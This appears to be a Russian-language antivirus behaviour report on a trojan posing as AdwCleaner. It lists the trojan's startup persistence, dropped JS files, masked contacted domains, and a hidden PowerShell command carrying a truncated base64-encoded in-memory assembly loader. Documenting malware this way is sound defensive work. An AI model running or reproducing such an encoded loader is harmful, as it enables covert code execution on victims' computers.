Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\winrar.ini.lnk
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\rsload.net.adwcleaner.exe
- %APPDATA%\id-b01.js
- %HOMEPATH%\appdata\winrar.js
Сетевая активность
TCP
- 'ad######er.malwarebytes.com':443
UDP
- DNS ASK ad######er.malwarebytes.com
- DNS ASK si##j.space
Другое
Создает и запускает на исполнение
- '%APPDATA%\rsload.net.adwcleaner.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\ID-B01.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AYgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAG...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AYgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAG...
